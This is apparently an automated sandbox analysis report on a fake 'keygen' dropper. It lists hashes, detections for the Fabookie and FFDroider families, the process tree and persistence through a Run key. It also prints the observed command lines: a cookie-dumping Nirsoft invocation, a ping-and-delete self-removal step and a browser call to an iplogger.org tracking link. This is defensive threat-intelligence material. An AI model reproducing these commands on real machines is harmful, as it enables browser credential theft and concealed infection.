Resubmissions

Submitted          Task ID             Score
12-11-2024 01:29   241112-bwgrxs1gnf   10
08-07-2021 12:18   210708-8z6d5h8z2n   10
06-07-2021 17:53   210706-g6we6sa7sa   10
19-06-2021 18:17   210619-vr8bj2dzfn   10
17-06-2021 21:39   210617-a9cvlnmrbx   10
11-06-2021 17:26   210611-wvab1yw2tj   10
08-06-2021 06:47   210608-qrbpch3y46   10
08-06-2021 06:47   210608-64tndgm1ln   10
05-06-2021 18:40   210605-cd6qpr55sx   10
04-06-2021 11:56   210604-5c416rs3ns   10

Analysis
max time kernel: 1799s
max time network: 1803s
platform: windows10-2004_x64
resource: win10v2004-20241007-en
resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
submitted: 12-11-2024 01:29
Static task: static1

Behavioral tasks

Task          Sample               Resource
behavioral1   Install.exe          win7-20240903-en
behavioral2   Install.exe          win10v2004-20241007-en
behavioral3   Install2.exe         win7-20241010-en
behavioral4   Install2.exe         win10v2004-20241007-en
behavioral5   keygen-step-4.exe    win7-20240708-en
behavioral6   keygen-step-4.exe    win10v2004-20241007-en
behavioral7   keygen-step-4d.exe   win7-20240903-en
General

Target: keygen-step-4.exe
Size: 4.6MB
MD5: 563107b1df2a00f4ec868acd9e08a205
SHA1: 9cb9c91d66292f5317aa50d92e38834861e9c9b7
SHA256: bf2bd257dde4921ce83c7c1303fafe7f9f81e53c2775d3c373ced482b22eb8a9
SHA512: 99a8d247fa435c4cd95be7bc64c7dd6e382371f3a3c160aac3995fd705e4fd3f6622c23784a4ae3457c87536347d15eda3f08aa616450778a99376df540d74d1
SSDEEP: 98304:H6Rles9UGuxV53gdsl7s1+IXKe3Z1bZaO4qFqAooEeGmRxl36Z1/B:H+lZ9UGuni+2R73Z1bZn4uKoEeGmRz6N
Malware Config
Signatures
Detect Fabookie payload (1 IoC)
  resource   yara_rule
  behavioral6/files/0x0007000000023c94-475.dat   family_fabookie

Fabookie family

Ffdroider family

Detected Nirsoft tools (2 IoCs)
Free utilities often used by attackers which can steal passwords, product keys, etc.
  resource   yara_rule
  behavioral6/memory/976-486-0x0000000000400000-0x000000000045B000-memory.dmp   Nirsoft
  behavioral6/memory/5320-508-0x0000000000400000-0x0000000000422000-memory.dmp   Nirsoft

Checks computer location settings (2 TTPs, 3 IoCs)
Looks up country code configured in the registry, likely geofence.
  description   ioc   Process
  Key value queried   \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation   keygen-step-4.exe
  Key value queried   \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation   xiuhuali.exe
  Key value queried   \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation   filee.exe

Executes dropped EXE (9 IoCs)
  pid   Process
  1280   xiuhuali.exe
  2920   JoSetp.exe
  3856   Install.exe
  1916   Install.tmp
  4832   filee.exe
  1368   jg6_6asg.exe
  1744   gaoou.exe
  976   jfiag3g_gg.exe
  5320   jfiag3g_gg.exe

Loads dropped DLL (2 IoCs)
  pid   Process
  2720   rundll32.exe
  1916   Install.tmp

Reads user/profile data of web browsers (3 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.

Adds Run key to start application (2 TTPs, 1 IoC)
  description   ioc   Process
  Set value (str)   \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.exe"   gaoou.exe

Checks whether UAC is enabled (1 IoC)
  description   ioc   Process
  Key value queried   \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA   jg6_6asg.exe

Legitimate hosting services abused for malware hosting/C2 (1 TTP, 5 IoCs)
  flow   ioc
  19   iplogger.org
  29   iplogger.org
  31   iplogger.org
  7   iplogger.org
  8   iplogger.org

Looks up external IP address via web service (1 IoC)
Uses a legitimate IP lookup service to find the infected system's external IP.
  flow   ioc
  44   ip-api.com

UPX packed file (5 IoCs)
  resource   yara_rule
  behavioral6/files/0x0007000000023cfc-484.dat   upx
  behavioral6/memory/976-486-0x0000000000400000-0x000000000045B000-memory.dmp   upx
  behavioral6/files/0x0009000000023cfd-500.dat   upx
  behavioral6/memory/5320-508-0x0000000000400000-0x0000000000422000-memory.dmp   upx
  behavioral6/memory/5320-502-0x0000000000400000-0x0000000000422000-memory.dmp   upx

Drops file in Program Files directory (3 IoCs)
  description   ioc   Process
  File created   C:\Program Files\install.dll   xiuhuali.exe
  File created   C:\Program Files\libEGL.dll   xiuhuali.exe
  File created   C:\Program Files\install.dat   xiuhuali.exe

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).

System Location Discovery: System Language Discovery (1 TTP, 12 IoCs)
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
  description   ioc   Process
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language   keygen-step-4.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language   xiuhuali.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language   jg6_6asg.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language   gaoou.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language   jfiag3g_gg.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language   rundll32.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language   Install.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language   Install.tmp
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language   filee.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language   cmd.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language   PING.EXE
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language   jfiag3g_gg.exe

System Network Configuration Discovery: Internet Connection Discovery (1 TTP, 2 IoCs)
Adversaries may check for Internet connectivity on compromised systems.
  pid   Process
  2120   cmd.exe
  4968   PING.EXE

Enumerates system info in registry (2 TTPs, 3 IoCs)
  description   ioc   Process
  Key opened   \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS   msedge.exe
  Key value queried   \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer   msedge.exe
  Key value queried   \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName   msedge.exe

Runs ping.exe (1 TTP, 1 IoC)
  pid   Process
  4968   PING.EXE

Suspicious behavior: EnumeratesProcesses (12 IoCs)
  pid   Process   count
  2804   msedge.exe   2
  2948   msedge.exe   2
  3904   identity_helper.exe   2
  5320   jfiag3g_gg.exe   2
  2100   msedge.exe   4

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary (6 IoCs)
  pid   Process   count
  2948   msedge.exe   6

Suspicious use of AdjustPrivilegeToken (4 IoCs)
  description   pid   Process   count
  Token: SeDebugPrivilege   2920   JoSetp.exe   1
  Token: SeManageVolumePrivilege   1368   jg6_6asg.exe   3

Suspicious use of FindShellTrayWindow (25 IoCs)
  pid   Process   count
  2948   msedge.exe   25

Suspicious use of SendNotifyMessage (24 IoCs)
  pid   Process   count
  2948   msedge.exe   24

Suspicious use of SetWindowsHookEx (2 IoCs)
  pid   Process   count
  1280   xiuhuali.exe   2

Suspicious use of WriteProcessMemory (64 IoCs)
  description   pid   Process   procid_target   count
  PID 4472 wrote to memory of 1280   4472   keygen-step-4.exe   86   3
  PID 1280 wrote to memory of 2720   1280   xiuhuali.exe   88   3
  PID 4472 wrote to memory of 2920   4472   keygen-step-4.exe   89   2
  PID 4472 wrote to memory of 3856   4472   keygen-step-4.exe   93   3
  PID 3856 wrote to memory of 1916   3856   Install.exe   94   3
  PID 4472 wrote to memory of 4832   4472   keygen-step-4.exe   95   3
  PID 4832 wrote to memory of 2120   4832   filee.exe   100   3
  PID 2120 wrote to memory of 4968   2120   cmd.exe   102   3
  PID 4472 wrote to memory of 2948   4472   keygen-step-4.exe   103   2
  PID 2948 wrote to memory of 3280   2948   msedge.exe   104   2
  PID 4472 wrote to memory of 1368   4472   keygen-step-4.exe   105   3
  PID 2948 wrote to memory of 5000   2948   msedge.exe   106   34
Processes

C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe"
  PID: 4472
  - Checks computer location settings
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory

    C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe
      Command line: "C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe"
      PID: 1280
      - Checks computer location settings
      - Executes dropped EXE
      - Drops file in Program Files directory
      - System Location Discovery: System Language Discovery
      - Suspicious use of SetWindowsHookEx
      - Suspicious use of WriteProcessMemory

        C:\Windows\SysWOW64\rundll32.exe
          Command line: "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
          PID: 2720
          - Loads dropped DLL
          - System Location Discovery: System Language Discovery

    C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
      Command line: "C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe"
      PID: 2920
      - Executes dropped EXE
      - Suspicious use of AdjustPrivilegeToken

    C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
      Command line: "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
      PID: 3856
      - Executes dropped EXE
      - System Location Discovery: System Language Discovery
      - Suspicious use of WriteProcessMemory

        C:\Users\Admin\AppData\Local\Temp\is-ADEH6.tmp\Install.tmp
          Command line: "C:\Users\Admin\AppData\Local\Temp\is-ADEH6.tmp\Install.tmp" /SL5="$A026C,235791,152064,C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
          PID: 1916
          - Executes dropped EXE
          - Loads dropped DLL
          - System Location Discovery: System Language Discovery

    C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe
      Command line: "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"
      PID: 4832
      - Checks computer location settings
      - Executes dropped EXE
      - System Location Discovery: System Language Discovery
      - Suspicious use of WriteProcessMemory

        C:\Windows\SysWOW64\cmd.exe
          Command line: "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe" >> NUL
          PID: 2120
          - System Location Discovery: System Language Discovery
          - System Network Configuration Discovery: Internet Connection Discovery
          - Suspicious use of WriteProcessMemory

            C:\Windows\SysWOW64\PING.EXE
              Command line: ping 127.0.0.1
              PID: 4968
              - System Location Discovery: System Language Discovery
              - System Network Configuration Discovery: Internet Connection Discovery
              - Runs ping.exe

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1rFsB6
      PID: 2948
      - Enumerates system info in registry
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      - Suspicious use of FindShellTrayWindow
      - Suspicious use of SendNotifyMessage
      - Suspicious use of WriteProcessMemory

        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc9e2b46f8,0x7ffc9e2b4708,0x7ffc9e2b4718
          PID: 3280

        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,11691512908977492422,11982447055851183490,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2144 /prefetch:2
          PID: 5000

        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2132,11691512908977492422,11982447055851183490,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2196 /prefetch:3
          PID: 2804
          - Suspicious behavior: EnumeratesProcesses

        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2132,11691512908977492422,11982447055851183490,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2740 /prefetch:8
          PID: 2380

        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,11691512908977492422,11982447055851183490,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3312 /prefetch:1
          PID: 1592

        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,11691512908977492422,11982447055851183490,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3356 /prefetch:1
          PID: 1280

        C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
          Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2132,11691512908977492422,11982447055851183490,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5236 /prefetch:8
          PID: 1532

        C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
          Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2132,11691512908977492422,11982447055851183490,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5236 /prefetch:8
          PID: 3904
          - Suspicious behavior: EnumeratesProcesses

        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,11691512908977492422,11982447055851183490,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5328 /prefetch:1
          PID: 2100

        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,11691512908977492422,11982447055851183490,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5296 /prefetch:1
          PID: 448

        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,11691512908977492422,11982447055851183490,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4968 /prefetch:1
          PID: 1592

        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,11691512908977492422,11982447055851183490,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5476 /prefetch:1
          PID: 4904

        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,11691512908977492422,11982447055851183490,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2216 /prefetch:2
          PID: 2100
          - Suspicious behavior: EnumeratesProcesses

    C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe
      Command line: "C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe"
      PID: 1368
      - Executes dropped EXE
      - Checks whether UAC is enabled
      - System Location Discovery: System Language Discovery
      - Suspicious use of AdjustPrivilegeToken

    C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe
      Command line: "C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe"
      PID: 1744
      - Executes dropped EXE
      - Adds Run key to start application
      - System Location Discovery: System Language Discovery

        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
          Command line: C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
          PID: 976
          - Executes dropped EXE
          - System Location Discovery: System Language Discovery

        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
          Command line: C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
          PID: 5320
          - Executes dropped EXE
          - System Location Discovery: System Language Discovery
          - Suspicious behavior: EnumeratesProcesses

C:\Windows\System32\CompPkgSrv.exe
  Command line: C:\Windows\System32\CompPkgSrv.exe -Embedding
  PID: 2872

C:\Windows\System32\CompPkgSrv.exe
  Command line: C:\Windows\System32\CompPkgSrv.exe -Embedding
  PID: 4616
Network

MITRE ATT&CK Enterprise v15

Privilege Escalation
  Boot or Logon Autostart Execution (1)
    Registry Run Keys / Startup Folder (1)

Credential Access
  Credentials from Password Stores (1)
    Credentials from Web Browsers (1)
  Unsecured Credentials (1)
    Credentials In Files (1)
Downloads

Filesize: 544KB
MD5: 806c3221a013fec9530762750556c332
SHA1: 36475bcfd0a18555d7c0413d007bbe80f7d321b5
SHA256: 9bcecc5fb84d21db673c81a7ed1d10b28686b8261f79136f748ab7bbad7752f7
SHA512: 56bbaafe7b0883f4e5dcff00ae69339a3b81ac8ba90b304aeab3e4e7e7523b568fd9b269241fc38a39f74894084f1f252a91c22b79cc0a16f9e135859a13145e

Filesize: 5KB
MD5: fe60ddbeab6e50c4f490ddf56b52057c
SHA1: 6a71fdf73761a1192fd9c6961f66754a63d6db17
SHA256: 9fcfa73600ff1b588015ffa20779cec6714e48ee6ae15db8766f7ffd5ee3031d
SHA512: 0113b47ba1a33a2f597a26c9b66435483373cde4edb183e0e92abef8ed003743f426ba5ffe25a5807c030cc14d8a95d73aa6af95a85f44a86dd40264ecb96536

Filesize: 1KB
MD5: 67e486b2f148a3fca863728242b6273e
SHA1: 452a84c183d7ea5b7c015b597e94af8eef66d44a
SHA256: facaf1c3a4bf232abce19a2d534e495b0d3adc7dbe3797d336249aa6f70adcfb
SHA512: d3a37da3bb10a9736dc03e8b2b49baceef5d73c026e2077b8ebc1b786f2c9b2f807e0aa13a5866cf3b3cafd2bc506242ef139c423eaffb050bbb87773e53881e

Filesize: 436B
MD5: 971c514f84bba0785f80aa1c23edfd79
SHA1: 732acea710a87530c6b08ecdf32a110d254a54c8
SHA256: f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895
SHA512: 43dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12
Filesize: 174B
MD5: 90941fb53a8e75ce52ee215b8dfc5d42
SHA1: c7dc23ff937cb7b2f0c1a79cdc90eefeec9b031d
SHA256: f9cfd601d2f727a2f085460a4a5389c07811e3c18c4c8deb3f46999d4093de66
SHA512: 5f2d060acda40dd21989ca78e49b5e6df201e3301468b4d72733e7b633095dd0eb9c42226fff12dd03b01cf52b325b43e0b4d3ff1a40e749ddbf6a16e93b8ee5

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8
Filesize: 170B
MD5: 27b380e1c24d7f925b8ac2f8e3be5d99
SHA1: 062abc228c7eeda746999d48ca42e85cb58d0e6f
SHA256: c722590cd181173f3171df656e75d9cec53d0ca4a4122e944639f6a1d87e2e2f
SHA512: 84598ab21c9a1c6fbdfe66b68b4faf0f4977cf2fb704552fae097244a6a02d216da2281e2d77cd51c9efdc3dc4a0956a4b1378a6564019231169c26428e157a0

Filesize: 152B
MD5: d22073dea53e79d9b824f27ac5e9813e
SHA1: 6d8a7281241248431a1571e6ddc55798b01fa961
SHA256: 86713962c3bb287964678b148ee08ea83fb83483dff8be91c8a6085ca560b2a6
SHA512: 97152091ee24b6e713b8ec8123cb62511f8a7e8a6c6c3f2f6727d0a60497be28814613b476009b853575d4931e5df950e28a41afbf6707cb672206f1219c4413

Filesize: 152B
MD5: bffcefacce25cd03f3d5c9446ddb903d
SHA1: 8923f84aa86db316d2f5c122fe3874bbe26f3bab
SHA256: 23e7cbbf64c81122c3cb30a0933c10a320e254447771737a326ce37a0694d405
SHA512: 761dae5315b35ec0b2fe68019881397f5d2eadba3963aba79a89f8953a0cd705012d7faf3a204a5f36008926b9f614980e333351596b06ce7058d744345ce2e7

Filesize: 180B
MD5: 4bc8a3540a546cfe044e0ed1a0a22a95
SHA1: 5387f78f1816dee5393bfca1fffe49cede5f59c1
SHA256: f90fcadf34fbec9cabd9bcfdea0a63a1938aef5ea4c1f7b313e77f5d3f5bbdca
SHA512: e75437d833a3073132beed8280d30e4bb99b32e94d8671528aec53f39231c30476afb9067791e4eb9f1258611c167bfe98b09986d1877ca3ed96ea37b8bceecf

Filesize: 5KB
MD5: 3c10dd18880a217fc802a5ccbf0ebca6
SHA1: af27e7848fcba64df5707104ab8d3613bb020066
SHA256: 2f89580faaa783e1a769ef50f018c231d35d13ca81ef65fd0b8f04a41b0b4a26
SHA512: 5e31047cb4a8b7c9fcee52dc560c56f08ac04370aa386a04b684fc0ee03694f093a871c5ab310606cc06c1cef2f00c812172ee5658d2bbac9576299616c7118a

Filesize: 6KB
MD5: 32f618e6eae9a87ba906dc78780d763a
SHA1: 70c533b6d5f920584ad82b73859e4a85e1790286
SHA256: b850981a9b820ad06fc407f0950107c5092348f7f57c5581b9e53773ebaad8b4
SHA512: 15fad7a4efb2230d5355137f71e896e00bb400cb94c47f586052fffa596d5cff0ac3a6a9b1aae4a445f1aac56b6aea1148fe9fc0c2edb4c3805c5cb40d74107e

Filesize: 16B
MD5: 6752a1d65b201c13b62ea44016eb221f
SHA1: 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256: 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512: 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Filesize: 10KB
MD5: a6d1fc254ffcc8e31459f2b12bafbfdb
SHA1: 364a2a20dca9518052682514598d19e55a7818af
SHA256: 05cd5376a41d5f170164d9616135eb5b62ad70e1c3b32ec8ed01d9a64f8d6f97
SHA512: 4ad16c7244ec87feddad9c53a264e8b1ca1ec3482ff43f4239f192e9808f6b96af1f496682d6fecee5390909a5994d9b371836f1d267a23a5bb25022f104c477

Filesize: 4KB
MD5: ac617a651bb1cbe99b4c683f2e35a310
SHA1: c2ee8d99606a1a597c1e22e3b0f4c583677d5b66
SHA256: 58ba1337c7a32e3f4beb91c9086495d983474587157e88e861472e630097f4ca
SHA512: 33e7210062ad74afe20bba9dae42765999a9d1e831ec7a3bcd717caaf3155239654eee6f195a12f26155103b1c7018376db89593afe168b186bf37152a2323b6

Filesize: 497KB
MD5: 41a5f4fd1ea7cac4aa94a87aebccfef0
SHA1: 0d0abf079413a4c773754bf4fda338dc5b9a8ddc
SHA256: 97e95e99fd499ec45a7c1d8683d5731ce5e7a8fb8b710622e578cd169a00d8d9
SHA512: 5ca14bda498f26efff4e1179969b8f2c25244063c7bf25f3ec20b5cd24b5be320bbfb8b3d0b2d66f5c5b415da777a766fece5f251a4247773c6cb991417fb75f

Filesize: 153KB
MD5: 3b1b318df4d314a35dce9e8fd89e5121
SHA1: 55b0f8d56212a74bda0fc5f8cc0632ef52a4bc71
SHA256: 4df9e7fcd10900ae5def897377f54856b0ddad1798fa22614eba56096940885b
SHA512: f04faca320d344378dd31bf05556fb3ac02873e46e2140d5858162e739f5c25bc9b32d619587c84c36b768b9193ea5292d63f62bb0b8458b35d65959b52df6b4

Filesize: 14.0MB
MD5: ecc55f503eb5045ef2c5677d96829962
SHA1: 19b16794e1eb067f13387760b36cb9a531603e9a
SHA256: 5d331fec757976fbb812c6294195f5e21fa18d39d25b547f33eb562443c6e55a
SHA512: 60213986bc2ede649bdebf6a768af93132d2524af46a39097768b4722fb7d2173f7a4c51e6f2b4cb892b56488f92abcabd60164e238bfdfd17d8ef96dceb15dd

Filesize: 16KB
MD5: 58cc2571443ccb7ce13bbc15fdf37dd3
SHA1: da9e424985d1b6cd6d5ae77c1cf678bc98ff4a12
SHA256: 539f21351c1208540958454c59fad94378347ab1f8e7592af4260b2e02858bb7
SHA512: a0c81c265c4ba83bced0842ad3b1146d31ac6488c58e77e33eb4eb69502663f7b459fbb1fb8846815017e17a0cb5775389d41649abf4367d8b5c35122bb72ea9

Filesize: 16KB
MD5: b116734a735f942c1a548260b3ffc879
SHA1: a6180a050c51f04132c28607144826a73e9db987
SHA256: 7dd9872a6daaaa95b01888398c1ea4fb140395c87cdc7fab9d0b3bd8bde47c6e
SHA512: 070fbd60f4051afe1a8c2aecba82c0612771d3cf5e51fde3124990f7c32143d7ebdd0e5cd46b2adf31cafa0de61902d3e4cff057a7e9f80a34af8d4a20cf9504

Filesize: 16KB
MD5: cad546234f262c9fa86b1d320ab2a9af
SHA1: a9524bec2d732e43ed4ad0ea05825d6fab46c15f
SHA256: 2721ebc0834d4b6478c8f6de1b31f314902c6190eaa97d7424a1d860fead4e9c
SHA512: 9a65b885e38856061d40244476995f71604122ec5fdae190a15257b15ba2e243b087117e91f05911d48a711fd7a895abec61a679fcdf0feb745ee771e69a82cb

Filesize: 16KB
MD5: f3d3585853a6a9077e632437b883924d
SHA1: 04cab6c2539fc541bd9857174289b453111fc66e
SHA256: dc0aa28fb8bc308203a8a29bdae7c3c6059c3e551c0b14f6aae69b7dc1a39299
SHA512: a4b975da5144242a260a203b2dfd8a72a3286e626d2d0950a19333652d977504c0b10c1ff523d0587f1255d99a1453f841984db634bbefe3ae1a033b99f974b1

Filesize: 16KB
MD5: 628370ed861b1c3b6a5b944bcc87b529
SHA1: ff2b55b3390d79cbd449ee2c57f97ff3a465778c
SHA256: c86972d8f168b136b3e40b50ea2177c22c6fee2b970751b097c4096fb0315355
SHA512: 31dc3aec7c29acebdd5c2ad4a3a1c5a205d30165d00f04f366b277f29b80e65750aec6f04c5d8488386dbcbcf0407eb5177f3056e60d0eb1de5677d066755cdb

Filesize: 16KB
MD5: 2f9e9382bafea42beb2c25ff71c91728
